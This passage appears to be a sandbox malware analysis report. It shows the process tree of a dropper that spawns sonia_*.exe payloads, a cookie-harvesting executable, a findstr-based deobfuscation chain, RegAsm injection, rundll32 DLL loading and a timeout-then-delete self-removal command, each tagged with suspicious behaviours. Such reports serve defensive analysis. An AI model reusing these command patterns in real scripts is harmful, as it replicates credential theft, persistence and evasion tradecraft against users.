                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gfna2qed.xwf\installer.exe /qn CAMPAIGN=654 & exit
                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                      PID:6636
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\gfna2qed.xwf\installer.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\gfna2qed.xwf\installer.exe /qn CAMPAIGN=654
                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                          PID:6780
                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ntljmfjb.nb4\app.exe /8-2222 & exit
                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                          PID:6704
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ntljmfjb.nb4\app.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\ntljmfjb.nb4\app.exe /8-2222
                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                              PID:6824
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\ntljmfjb.nb4\app.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\ntljmfjb.nb4\app.exe" /8-2222
                                                                                                                                                                                                                15⤵
                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                PID:7060
                                                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe
                                                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                    PID:5600
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                                                                                          4⤵
                                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                                          PID:1008
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8D9BC4B4\sonia_6.exe
                                                                                                                                                                                            sonia_6.exe
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                                            PID:1608
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:2504
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:4700
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:6708
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:5852
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:2292
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                PID:2296
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8D9BC4B4\sonia_4.exe
                                                                                                                                                                                                  sonia_4.exe
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                  PID:2248
                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 528
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                PID:3180
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c sonia_3.exe
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                PID:2976
                                                                                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:1408
                                                                                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:1244
                                                                                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:1188
                                                                                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:1056
                                                                                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                  PID:912
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\wgcfjss
                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\wgcfjss
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                    PID:4528
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\wgcfjss
                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\wgcfjss
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                      PID:7136
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\iccfjss
                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\iccfjss
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                    PID:6248
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\wgcfjss
                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\wgcfjss
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                    PID:4412
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\wgcfjss
                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\wgcfjss
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                      PID:6460
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\iccfjss
                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\iccfjss
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                    PID:1804
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\wgcfjss
                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\wgcfjss
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                    PID:5476
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\wgcfjss
                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\wgcfjss
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:2908
                                                                                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:340
                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                      PID:740
                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                        PID:2384
                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                        PID:4736
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS8D9BC4B4\sonia_3.exe
                                                                                                                                                                                                      sonia_3.exe
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                                                                      PID:3920
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3920 -s 1428
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                        PID:4620
                                                                                                                                                                                                    • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                      PID:3780
                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                        PID:2416
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\AB7E.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\AB7E.exe
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      PID:5228
                                                                                                                                                                                                      • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                                                                                        "C:\Windows\System32\dllhost.exe"
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:5624
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c cmd < Perisce.jar
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:5760
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              cmd
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:2600
                                                                                                                                                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                  findstr /V /R "^RjxbYtQhXRvMStXsrWjZzMEutIshVobYBYKPlbziZPusCiQZrGYjUBLtHgafMCaOxblTxouFDtZDGjDXRslgl$" Presto.jar
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:5624
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Preme.exe.com
                                                                                                                                                                                                                    Preme.exe.com r
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:5772
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Preme.exe.com
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Preme.exe.com r
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                          PID:2416
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Preme.exe.com
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Preme.exe.com r
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                              PID:5700
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Preme.exe.com
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Preme.exe.com r
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                  PID:6116
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Preme.exe.com
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Preme.exe.com r
                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                      PID:6076
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Preme.exe.com
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Preme.exe.com r
                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                        • Drops startup file
                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                        PID:668
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe 
                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                            PID:6420
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                ping localhost -n 30
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                PID:208
                                                                                                                                                                                                                        • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                          PID:5268
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                            PID:5692
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\BB8D.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\BB8D.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                          PID:5164
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1E9D.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\1E9D.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:5396
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\qVvquLokHABE.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\qVvquLokHABE.exe"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:5192
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\22A5.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\22A5.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                              • Drops desktop.ini file(s)
                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                              • System policy modification
                                                                                                                                                                                                                              PID:5020
                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                              PID:5404
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\31E8.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\31E8.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                              PID:492
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\31E8.exe"
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:4968
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                    timeout /T 10 /NOBREAK
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                    PID:696
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\38EE.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\38EE.exe
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                PID:5592
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3B9F.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\3B9F.exe
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:2228
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\414D.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\414D.exe
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:5056
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:4024
                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:3780
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:5156
                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                          PID:5640
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:636
                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                            PID:5188
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:1328
                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                              PID:5924
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:5392
                                                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:764
                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                  PID:5680
                                                                                                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                  PID:4480
                                                                                                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                  PID:4532
                                                                                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding BB5D0D8670433D74C6E4F011578CD9C9 C
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                    PID:6068
                                                                                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 1785F37C2F61654F88590ECCE6397A44
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                    PID:7144
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                      "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                      PID:6864
                                                                                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 09464F5E817D580AA9872822AB0895F3 E Global\MSI0000
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                    PID:6864
                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                  PID:6916
                                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                  PID:7020
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                    PID:7036
                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                  PID:6568
                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                  PID:7072
                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k wsappx -s AppXSvc
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:6464
                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                    PID:7032
                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                    PID:5804
                                                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:6152
                                                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:6216
                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                        PID:6340
                                                                                                                                                                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                        1⤵
